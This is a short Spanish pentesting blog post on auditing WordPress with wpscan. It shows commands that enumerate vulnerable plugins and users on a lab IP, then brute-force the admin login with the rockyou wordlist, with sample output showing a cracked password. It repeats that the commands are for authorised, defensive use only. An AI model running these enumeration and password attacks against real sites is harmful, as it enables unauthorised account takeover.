~ / blog / pentesting
KALI

Hackea (audita) WordPress

WordPress corre en casi la mitad de la web, y sus plugins son un coladero.

wpscan enumera la versión del core, los temas y sobre todo los plugins vulnerables. Con enumerate u lista los usuarios reales del sitio.

Y con esos usuarios puedes lanzar un ataque de contraseñas al login. La mayoría de los WordPress hackeados caen por un plugin viejo.

Solo en sitios propios o con permiso.

# los comandos

kali@kali:~$ wpscan --url http://10.0.0.5 --enumerate vp,ucopiar
[+] WordPress 6.2 (desactualizado)
[!] Plugin: contact-form-7 5.3 - CVE-2023-...
[+] Users: admin, editor
kali@kali:~$ wpscan --url http://10.0.0.5 -U admin -P rockyou.txtcopiar
[+] Valid Combinations Found: admin / verano2026
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.